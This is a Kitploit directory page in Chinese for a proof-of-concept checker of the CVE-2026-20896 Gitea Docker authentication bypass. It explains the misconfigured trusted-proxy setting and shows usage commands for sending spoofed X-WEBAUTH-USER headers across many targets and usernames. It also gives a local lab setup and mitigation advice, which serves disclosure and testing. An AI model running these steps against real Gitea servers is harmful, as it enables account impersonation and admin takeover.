Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2026-20896-gitea-poc — CVE-2026-20896 Gitea Docker X-WEBAUTH-USER 身份验证绕过检查器 | Kitploit
工具/GitHubGitHub/szybnev/cve-2026-20896-gitea-poc
身份验证与授权漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubszybnev/cve-2026-20896-gitea-poc

cve-2026-20896-gitea-poc

CVE-2026-20896 Gitea Docker X-WEBAUTH-USER 身份验证绕过检查器

查看仓库
101个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-20896 Gitea Docker 认证绕过检测器

仅限授权的红队/渗透测试操作。

本仓库包含 CVE-2026-20896 的极简检测器,该漏洞是官方 Gitea Docker 镜像在启用反向代理认证时存在的认证绕过漏洞,影响版本直至并包括 1.26.2。

CVE-2026-20896 是什么

受影响的 Gitea Docker 镜像附带了一个包含以下内容的 app.ini 模板:

root@kitploit:~
REVERSE_PROXY_TRUSTED_PROXIES = *

当管理员启用:

root@kitploit:~
ENABLE_REVERSE_PROXY_AUTHENTICATION = true

Gitea 会信任来自任何能够直接访问容器 HTTP 端口的源 IP 的 X-WEBAUTH-USER。绕过预期认证反向代理的客户端只需发送一个请求头,即可冒充已知或可猜测的用户。

实际影响是未认证的账户冒充。如果猜测的用户是管理员,最坏情况下可对 Gitea 实例及其仓库实现完整的应用级接管。主机 RCE 取决于具体环境,本检测器不对此作断言。

修复版本始于 1.26.3;建议升级到 1.26.4 或更高版本。

PoC 工作原理

该检测器:

  1. 获取目标主页面。
  2. 查找页脚文本,例如 Powered by Gitea Version: 1.26.4。
  3. 默认情况下,如果解析出的版本为 >= 1.26.3,则跳过测试。
  4. 对每个提供的用户名发送带有 X-WEBAUTH-USER: <username> 的 GET / 请求。
  5. 当返回的页面标题看起来像该用户已登录的仪表盘时,报告命中。

Go 版本支持多目标、用户名文件、并发、超时、JSONL 输出、TLS --insecure、--dry-run 和 --force。

构建

root@kitploit:~
go build -o gitea-cve-2026-20896-check .

无需第三方 Go 依赖。

使用方法

单目标:

root@kitploit:~
./gitea-cve-2026-20896-check \
  --url http://localhost:3000 \
  --users admin,gitea_admin,alice

多目标与多用户名:

root@kitploit:~
./gitea-cve-2026-20896-check \
  --targets targets.txt \
  --user-file users.txt \
  --concurrency 64 \
  --timeout 8s \
  --jsonl

试运行:

root@kitploit:~
./gitea-cve-2026-20896-check \
  --url http://localhost:3000 \
  --users admin,alice \
  --dry-run

Bash 备用脚本:

root@kitploit:~
./poc.sh --url http://localhost:3000 --users admin,alice

退出码

  • 0:已确认至少一个存在漏洞的冒充行为
  • 1:未确认任何存在漏洞的冒充行为
  • 2:用法、输入或运行时错误

本地复现实验环境

以下实验环境将启动一个受影响的本地 Gitea 容器并创建一个测试用户:

root@kitploit:~
docker run -d --name gitea-cve-2026-20896 \
  -p 127.0.0.1:3000:3000 \
  -e GITEA__service__ENABLE_REVERSE_PROXY_AUTHENTICATION=true \
  -e GITEA__security__INSTALL_LOCK=true \
  gitea/gitea:1.26.2

sleep 15

docker exec --user git gitea-cve-2026-20896 gitea admin user create \
  --username alice \
  --password 'longpasswordhere1234' \
  --email [email protected] \
  --must-change-password=false

./gitea-cve-2026-20896-check --url http://localhost:3000 --users bob,alice,admin

预期阳性结果:

root@kitploit:~
[VULNERABLE] http://localhost:3000 user=alice title="alice - Dashboard - Gitea: Git with a cup of tea"

清理:

root@kitploit:~
docker rm -f gitea-cve-2026-20896

缓解措施

  • 将 Gitea 升级到 1.26.3 或更高版本;首选 1.26.4 或更高版本。
  • 不要将后端 Gitea 容器的 HTTP 端口直接暴露给不受信任的网络。
  • 显式配置受信任的反向代理。
  • 除非网络路径和代理信任边界已明确,否则保持反向代理认证处于禁用状态。

参考链接

  • Gitea 安全公告:https://github.com/go-gitea/gitea/security/advisories/GHSA-f75j-4cw6-rmx4
  • Gitea 1.26.3 / 1.26.4 版本发布说明:https://blog.gitea.com/release-of-1.26.3-and-1.26.4/
  • 修复 PR:https://github.com/go-gitea/gitea/pull/38151
  • CVE 记录:https://www.cve.org/CVERecord?id=CVE-2026-20896
  • 通过 The Hacker News / Sysdig 遥测得到的野外探测报告:https://thehackernews.com/2026/07/threat-actors-probe-gitea-docker-flaw.html
下载工具